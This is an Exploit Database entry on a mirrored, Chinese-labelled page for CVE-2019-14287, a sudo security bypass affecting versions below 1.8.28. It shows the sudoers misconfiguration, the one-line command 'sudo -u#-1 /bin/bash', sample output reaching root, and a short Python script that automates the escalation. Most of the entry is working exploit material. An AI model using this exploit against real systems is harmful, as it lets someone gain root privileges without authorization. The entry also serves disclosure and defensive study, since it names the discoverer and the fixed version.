sudo 1.8.27 – Security Bypass

• Exploit Database
• 23 阅读

• 作者： Mohin Paramasivam
  日期： 2019-10-15
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47502/

• # Exploit Title : sudo 1.8.27 - Security Bypass
  # Date : 2019-10-15
  # Original Author: Joe Vennix
  # Exploit Author : Mohin Paramasivam (Shad0wQu35t)
  # Version : Sudo <1.8.28
  # Tested on Linux
  # Credit : Joe Vennix from Apple Information Security found and analyzed the bug
  # Fix : The bug is fixed in sudo 1.8.28
  # CVE : 2019-14287
  
  '''Check for the user sudo permissions
  
  sudo -l 
  
  User hacker may run the following commands on kali:
  (ALL, !root) /bin/bash
  
  
  So user hacker can't run /bin/bash as root (!root)
  
  
  User hacker sudo privilege in /etc/sudoers
  
  # User privilege specification
  rootALL=(ALL:ALL) ALL
  
  hacker ALL=(ALL,!root) /bin/bash
  
  
  With ALL specified, user hacker can run the binary /bin/bash as any user
  
  EXPLOIT: 
  
  sudo -u#-1 /bin/bash
  
  Example : 
  
  hacker@kali:~$ sudo -u#-1 /bin/bash
  root@kali:/home/hacker# id
  uid=0(root) gid=1000(hacker) groups=1000(hacker)
  root@kali:/home/hacker#
  
  Description :
  Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
  -u#-1 returns as 0 which is root's id
  
  and /bin/bash is executed with root permission
  Proof of Concept Code :
  
  How to use :
  python3 sudo_exploit.py
  
  '''
  
  
  #!/usr/bin/python3
  
  import os
  
  #Get current username
  
  username = input("Enter current username :")
  
  
  #check which binary the user can run with sudo
  
  os.system("sudo -l > priv")
  
  
  os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
  
  binary_file = open("binary")
  
  binary= binary_file.read()
  
  #execute sudo exploit
  
  print("Lets hope it works")
  
  os.system("sudo -u#-1 "+ binary)